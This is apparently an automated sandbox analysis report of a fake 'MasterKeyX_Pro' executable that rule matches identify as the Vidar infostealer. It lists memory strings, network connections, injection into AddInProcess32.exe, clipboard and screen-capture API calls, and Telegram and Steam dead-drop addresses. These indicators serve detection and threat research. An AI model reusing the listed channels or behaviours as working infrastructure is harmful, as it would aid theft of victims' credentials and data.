Source: chrome.exe, 0000000A.00000002.2808785942.000040CC00E80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2800750043.000040CC002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2808859542.000040CC00E8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 0000000A.00000002.2808785942.000040CC00E80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2730724793.000040CC00744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2808859542.000040CC00E8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 0000000A.00000002.2808785942.000040CC00E80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2730724793.000040CC00744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 0000000A.00000002.2808785942.000040CC00E80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2730724793.000040CC00744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2808859542.000040CC00E8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 0000000A.00000002.2801641614.000040CC004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 0000000A.00000003.2735055489.000040CC00304000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 0000000A.00000002.2800360268.000040CC001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 0000000A.00000002.2801641614.000040CC004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2803365719.000040CC007E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2803480647.000040CC0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000000A.00000002.2801641614.000040CC004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2803365719.000040CC007E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2803480647.000040CC0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 0000000A.00000002.2801481792.000040CC00428000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2627741539.000000000472E000.00000004.00000800.00020000.00000000.sdmp, MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2612742813.0000000002D13000.00000004.00000800.00020000.00000000.sdmp, MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2627741539.00000000046FB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.2282204244.0000000000140000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199819539662
Source: AddInProcess32.exe, 00000006.00000002.2282204244.0000000000140000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199819539662go2dnizMozilla/5.0
Source: AddInProcess32.exe, 00000007.00000002.2917816163.00000000046CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: AddInProcess32.exe, 00000007.00000002.2917816163.00000000046CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: AddInProcess32.exe, 00000007.00000002.2913344037.0000000003C98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: AddInProcess32.exe, 00000007.00000002.2913344037.0000000003C73000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: AddInProcess32.exe, 00000007.00000002.2913344037.0000000003C98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: AddInProcess32.exe, 00000007.00000002.2913344037.0000000003C73000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: AddInProcess32.exe, 00000007.00000002.2909478059.000000000122B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: AddInProcess32.exe, 00000007.00000002.2909478059.000000000122B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/N
Source: AddInProcess32.exe, 00000007.00000002.2909478059.000000000122B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phell
Source: AddInProcess32.exe, 00000007.00000002.2909478059.000000000122B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phell)
Source: AddInProcess32.exe, 00000007.00000002.2909478059.000000000122B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phellc
Source: AddInProcess32.exe, 00000006.00000002.2282204244.0000000000140000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000007.00000002.2909090487.000000000041E000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phellgo2dnizMozilla/5.0
Source: chrome.exe, 0000000A.00000002.2800360268.000040CC001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: AddInProcess32.exe, 00000007.00000002.2909478059.000000000122B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2627741539.0000000004754000.00000004.00000800.00020000.00000000.sdmp, MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2643693462.0000000008230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2708471643.00000000043D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.anon.com/frit/asfta.dara
Source: AddInProcess32.exe, 00000007.00000002.2913344037.0000000003D4D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 0000000A.00000003.2731333627.000040CC00D0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 0000000A.00000002.2801537620.000040CC00484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 0000000A.00000002.2804422117.000040CC00978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2809292975.000040CC00F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2800360268.000040CC001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 0000000A.00000002.2804422117.000040CC00978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2809292975.000040CC00F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2800360268.000040CC001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: AddInProcess32.exe, 00000007.00000002.2913344037.0000000003D4D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2731179861.000040CC00C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2802273150.000040CC005C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2801711629.000040CC004EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2763677878.000040CC00C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2752368053.000040CC00C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2803036839.000040CC00760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 0000000A.00000003.2731179861.000040CC00C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2763677878.000040CC00C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2752368053.000040CC00C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoresent
Source: chrome.exe, 0000000A.00000003.2731179861.000040CC00C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2763677878.000040CC00C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2752368053.000040CC00C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icories
Source: chrome.exe, 0000000A.00000002.2801481792.000040CC00428000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
Source: chrome.exe, 0000000A.00000002.2801481792.000040CC00428000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 0000000A.00000003.2735055489.000040CC00304000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 0000000A.00000002.2801641614.000040CC004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 0000000A.00000002.2805118486.000040CC00A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 0000000A.00000002.2799512797.000040CC0000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 0000000A.00000002.2800433883.000040CC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 0000000A.00000002.2800433883.000040CC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 0000000A.00000002.2800433883.000040CC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 0000000A.00000002.2800433883.000040CC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 0000000A.00000002.2801641614.000040CC004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 0000000A.00000003.2748059419.000040CC013B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 0000000A.00000003.2749028609.000040CC0144C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2748400748.000040CC013B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2751896755.000040CC013B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2748059419.000040CC013B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 0000000A.00000003.2748059419.000040CC013B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.49JL8PttH04.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 0000000A.00000003.2748059419.000040CC013B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.avVfaMsGWq0.L.W.O/m=qmd
Source: AddInProcess32.exe, 00000007.00000002.2917816163.00000000046CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: AddInProcess32.exe, 00000007.00000002.2917816163.00000000046CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: AddInProcess32.exe, 00000007.00000002.2917816163.00000000046CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: AddInProcess32.exe, 00000007.00000002.2917816163.00000000046CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: AddInProcess32.exe, 00000007.00000002.2917816163.00000000046CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: chrome.exe, 0000000A.00000002.2800750043.000040CC002E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 91.134.82.79:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 91.134.82.79:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49963 version: TLS 1.2
Source: unknown HTTPS traffic detected: 5.75.209.106:443 -> 192.168.2.4:49968 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:50015 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:50018 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:50021 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:50029 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:50033 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:50035 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0043A020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard, 8_2_0043A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0043A020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard, 8_2_0043A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0043A1C0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 8_2_0043A1C0

System Summary

barindex
Source: 6.2.AddInProcess32.exe.140000.0.raw.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 6.2.AddInProcess32.exe.140000.0.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 0.2.MasterKeyX_Pro_v4.3.exe.2d56fa8.3.raw.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 00000006.00000002.2282204244.0000000000140000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C96A8 CreateProcessAsUserW, 0_2_065C96A8
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_0141D8C4 0_2_0141D8C4
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADD990 0_2_02ADD990
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADAE98 0_2_02ADAE98
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02AD2FB8 0_2_02AD2FB8
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02AD0D68 0_2_02AD0D68
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02AD9AAC 0_2_02AD9AAC
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02AD8AA4 0_2_02AD8AA4
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02AD9AC8 0_2_02AD9AC8
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02AD8AD8 0_2_02AD8AD8
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02AD8A47 0_2_02AD8A47
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02AD7BA8 0_2_02AD7BA8
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02AD7BB8 0_2_02AD7BB8
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADBBB8 0_2_02ADBBB8
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADCBEA 0_2_02ADCBEA
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADCBF8 0_2_02ADCBF8
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADBBC8 0_2_02ADBBC8
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADEBC0 0_2_02ADEBC0
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADD331 0_2_02ADD331
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADD350 0_2_02ADD350
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADC8B0 0_2_02ADC8B0
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADC8C0 0_2_02ADC8C0
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADB818 0_2_02ADB818
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADE190 0_2_02ADE190
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADD969 0_2_02ADD969
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADAE88 0_2_02ADAE88
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADC6F2 0_2_02ADC6F2
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADCE40 0_2_02ADCE40
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADC7B0 0_2_02ADC7B0
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADBF88 0_2_02ADBF88
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02AD9F08 0_2_02AD9F08
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADBF78 0_2_02ADBF78
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02AD0D57 0_2_02AD0D57
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_06532D3D 0_2_06532D3D
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_06532DD0 0_2_06532DD0
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_0653A61A 0_2_0653A61A
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_0653A628 0_2_0653A628
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_06535D58 0_2_06535D58
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_06535D49 0_2_06535D49
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_06540040 0_2_06540040
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_06542018 0_2_06542018
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_06540006 0_2_06540006
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_06542028 0_2_06542028
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065490B8 0_2_065490B8
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065490A8 0_2_065490A8
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_06547A78 0_2_06547A78
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_06540A68 0_2_06540A68
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_06547A68 0_2_06547A68
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_06540A2C 0_2_06540A2C
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_06541AA8 0_2_06541AA8
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_06541BF0 0_2_06541BF0
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C32D0 0_2_065C32D0
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C0040 0_2_065C0040
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C5148 0_2_065C5148
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065CA128 0_2_065CA128
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C32C3 0_2_065C32C3
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C0AE7 0_2_065C0AE7
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C8290 0_2_065C8290
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C4340 0_2_065C4340
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C7F78 0_2_065C7F78
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065CCF10 0_2_065CCF10
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C0B90 0_2_065C0B90
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C5848 0_2_065C5848
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C5C7A 0_2_065C5C7A
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C0006 0_2_065C0006
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C5C23 0_2_065C5C23
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C48CE 0_2_065C48CE
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C3540 0_2_065C3540
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C4940 0_2_065C4940
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C7910 0_2_065C7910
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C5138 0_2_065C5138
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C3530 0_2_065C3530
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_06B735C0 0_2_06B735C0
